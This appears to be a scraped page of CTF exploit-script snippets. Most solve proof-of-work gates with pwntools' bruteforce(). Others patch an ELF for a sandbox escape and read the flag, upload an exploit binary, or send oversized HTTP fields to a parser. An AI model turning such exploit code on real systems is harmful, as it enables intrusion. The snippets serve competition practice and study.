示例#1
文件: remote.py 项目: Hengle/ctf
def prof(r):
    """Answer the proof-of-work challenge read from tube ``r``.

    Reads one line from ``r`` as the challenge, searches for an alphanumeric
    suffix of at most 4 characters such that ``hash(challenge + suffix)``
    starts with five ``'0'`` characters, and sends that suffix back without
    a trailing newline.
    """
    # [:-1] drops the line terminator that recvline() leaves on the challenge.
    challenge = r.recvline()[:-1]
    charset = string.ascii_letters + string.digits

    def accepted(suffix):
        # NOTE(review): ``hash`` is presumably a module-level hex-digest
        # helper; the builtin hash() returns an int and has no startswith().
        return hash(challenge + suffix).startswith('00000')

    # 'downfrom' tries candidates of length 4 first, then shorter ones.
    # bruteforce() returns None when no candidate is accepted, in which case
    # the send() below is handed None instead of a string.
    answer = bruteforce(accepted, charset, length=4, method='downfrom')
    r.send(answer)
示例#2
文件: re.py 项目: ares57/ctf
    elf = f.read()

libc = ELF("./libc.so.6")
idx = elf.find(p64(0x227168 + 0x5cc000 - libc.sym["free"]))

for offset in range(0x5cc000, 0x300000, -0x1000):
    print hex(offset)
    dis = offset + 0x227168 - libc.sym["free"]
    if len(sys.argv) == 2:
        r = remote("39.105.151.182", 9999)
        r.recvuntil("key+\"")
        key = r.recv(10)
        r.recvuntil("==")
        ret = r.recv(4)
        data = bruteforce(lambda x: md5(x + key)[:4] == ret,
                          method="downfrom",
                          length=5,
                          alphabet=pool)
        r.sendline(data)
    else:
        r = remote("127.0.0.1", 1234)
    r.recvuntil("escape the sandbox!")
    payload = elf[:idx] + p64(dis) + elf[idx + 8:]
    try:
        r.sendline(base64.b64encode(payload))
        r.recvuntil("[*] Switching to interactive mode\n")
        r.sendline("cat flag")
        data = r.recvline()
        print data
        if "EOF" in data or "stopped" in data:
            r.close()
        else:
示例#3
文件: hack.py 项目: xtrm0/starctf2018
 def brute_force(prefix,s):
     """Find a short alphanumeric string whose SHA-256 matches ``s``.

     A candidate ``c`` matches when ``sha256(c + prefix).hexdigest() == s``.
     Despite its name, ``prefix`` is appended *after* the candidate.
     Candidates are drawn from ASCII letters and digits with a length bound
     of 4; bruteforce()'s default search method is used.
     """
     charset = string.ascii_letters + string.digits

     def matches(candidate):
         return sha256(candidate + prefix).hexdigest() == s

     # Returns None when no candidate within the bound matches.
     return bruteforce(matches, charset, length=4)
示例#4
def pow(prefix,data):
    """Complete ``prefix`` so that its hex-decoded SHA-256 equals ``data``.

    ``prefix`` is a hex string; exactly 3 characters from ``pool`` are
    appended, the result is hex-decoded (Python 2 ``str.decode("hex")``) and
    hashed. Returns ``prefix`` plus the matching 3-character suffix.

    Note that this definition shadows the builtin ``pow`` in its module.
    """
    def digest_matches(suffix):
        raw = (prefix + suffix).decode("hex")
        return sha256(raw).hexdigest() == data

    # method='fixed' restricts the search to candidates of exactly 3 chars.
    # bruteforce() returns None on failure, which makes the concatenation
    # below raise TypeError rather than return a bogus answer.
    suffix = bruteforce(digest_matches, pool, length=3, method='fixed')
    return prefix + suffix
示例#5
import hashlib

# pwntools global setting: log at debug verbosity, which echoes the raw bytes
# sent and received on every tube. Everything on the wire ends up in the
# console output, so treat captured logs as sensitive.
context.log_level = "debug"


def hash(x):
    """Return the SHA-256 digest of ``x`` as a lowercase hex string.

    This definition shadows the builtin ``hash`` for the rest of the module.
    """
    hasher = hashlib.sha256()
    hasher.update(x)
    return hasher.hexdigest()


# Open a pwntools tube to the challenge service.
r = remote("111.186.63.13", 10001)
# Proof-of-work gate: skip the banner up to the "XXXX+" marker, then read the
# server-chosen string up to (not including) the closing ")".
r.recvuntil("XXXX+")
prefix = r.recvuntil(")")[:-1]
print prefix
# The expected digest follows "== "; [:-1] strips the trailing newline.
r.recvuntil("== ")
result = r.recvline()[:-1]
print result
# Search alphanumeric candidates (length 4 first, then shorter) for one whose
# hash(candidate + prefix) equals the digest the server sent. Despite its
# name, ``prefix`` is appended after the candidate.
# NOTE(review): bruteforce() returns None when nothing matches, so a banner
# parsing mistake would only surface at the sendline() below; an explicit
# check on ``x`` would make that failure obvious.
x = bruteforce(lambda x: hash(x + prefix) == result,
               string.ascii_letters + string.digits,
               length=4,
               method='downfrom')

r.sendline(x)

# NOTE(review): the file is opened in text mode ("r"); if ./exp is a binary,
# "rb" is the portable choice — confirm what ./exp contains.
with open("./exp", "r") as f:
    exp = f.read()

# The upload is framed as a decimal length line followed by the raw contents.
r.sendline(str(len(exp)))
r.send(exp)

# Hand the connection over to the terminal.
r.interactive()
示例#6
#heap_add=0
#stack_add=0
def proof_of_work(sol, chal):
    """Return True when ``sol`` is a valid proof-of-work answer for ``chal``.

    The answer is valid when the hex SHA-256 digest of ``chal`` followed by
    ``sol`` begins with five ``'0'`` characters, i.e. 20 leading zero bits.
    """
    # The original carried a commented-out line that generates ``chal`` as 16
    # random letters/digits — presumably copied from the service side; here
    # the challenge is always supplied by the caller.
    digest = sha256(chal + sol).hexdigest()
    return digest[:5] == '00000'


# Target selection: with exactly one argv entry (no extra command-line
# arguments) the binary is started locally; otherwise the remote service is
# used and its proof-of-work gate is answered first.
if len(sys.argv) != 1:
    r = remote("49.4.91.205", 31337)
    # The first line from the service is the challenge; drop its newline.
    prefix = r.recvline()[:-1]
    # method='fixed' searches only 4-character candidates. bruteforce()
    # returns None when none satisfies proof_of_work(), which would then be
    # passed straight to sendline().
    r.sendline(bruteforce(
        lambda sol: proof_of_work(sol, prefix),
        string.letters + string.digits,
        method='fixed',
        length=4))
    # No local process exists in remote mode, so there is no pid to report.
    pid = 0
else:
    r = process(pwn_file)
    pid = r.pid


def debug():
    """Log the target's pid at debug level, then call ``pause()``.

    ``pid`` is the module-level value set during target selection (0 when a
    remote target is used). NOTE(review): ``pause`` is presumably pwntools'
    wait-for-keypress helper, used to allow attaching a debugger — confirm.
    """
    pid_message = "process pid:%d" % pid
    log.debug(pid_message)
    # Disabled diagnostics kept from the original:
    #log.debug("stack add:0x%x"%stack_add)
    #log.debug("heap add:0x%x"%heap_add)
    #log.debug("libc add:0x%x"%libc.address)
    pause()


# Send an HTTP-like request whose fields are far longer than a normal client
# would produce: a path of 9999 "a" characters, then Host and Authorization
# values of 0x100 "a" characters each.
# NOTE(review): looks like a length-handling test of the target's request
# parser; the listing ends here, so the rest of the exchange is not visible.
# A parser facing untrusted clients should bound request-line and header
# lengths before copying them.
r.sendline("get /%s 123" % ("a" * 9999))
r.sendline("HOST: %s" % ("a" * 0x100))
r.sendline("Authorization: %s" % ("a" * 0x100))
示例#7
 def solve(prefix):
     """Find a proof-of-work suffix for ``prefix``.

     A candidate ``c`` is accepted when the raw SHA-256 digest of
     ``prefix + c`` begins with three zero bytes (24 leading zero bits).
     Candidates come from letters and digits (Python 2 ``string.letters``)
     with a length bound of 4, using bruteforce()'s default search method.
     """
     charset = string.letters + string.digits

     def has_zero_prefix(candidate):
         return sha256(prefix + candidate).digest().startswith("\x00\x00\x00")

     # Returns None when no candidate within the bound is accepted.
     return bruteforce(has_zero_prefix, charset, length=4)